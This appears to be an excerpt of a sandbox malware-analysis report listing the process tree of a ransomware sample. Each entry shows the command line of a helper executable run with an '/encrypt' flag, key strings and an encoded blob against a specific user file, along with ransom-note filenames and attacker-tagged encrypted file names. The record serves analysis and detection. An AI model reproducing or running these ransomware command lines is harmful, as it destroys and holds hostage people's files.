C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Data1.cab.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Location Discovery: System Language Discovery
PID:6776
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Restore-My-Files.txt"5⤵PID:5116
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:1364
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\setup.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Location Discovery: System Language Discovery
PID:4012
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7076
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Restore-My-Files.txt"5⤵PID:6944
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\deployment.properties.gif"5⤵PID:6984
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\NTUSER.DAT"5⤵PID:1316
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\ntuser.dat.LOG1"5⤵PID:6116
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\ntuser.dat.LOG2"5⤵PID:5348
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf"5⤵PID:6552
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms"5⤵PID:4376
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms"5⤵PID:5776
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\ntuser.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6256
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Restore-My-Files.txt"5⤵
- System Location Discovery: System Language Discovery
PID:5460
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Contacts\!HELP_SOS.hta.gif"5⤵PID:1332
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Contacts\Admin.contact.sage.gif"5⤵PID:7148
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Contacts\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6672
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Contacts\Restore-My-Files.txt"5⤵PID:1020
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\!HELP_SOS.hta"5⤵
- System Location Discovery: System Language Discovery
PID:3276
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\!HELP_SOS.hta.gif"5⤵
- System Location Discovery: System Language Discovery
PID:6676
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\#Decrypt_Files_ReadMe#.rtf.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:1380
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\A8TfBlMc-hK4WM9cK.[[email protected]].gif"5⤵PID:4676
-
-
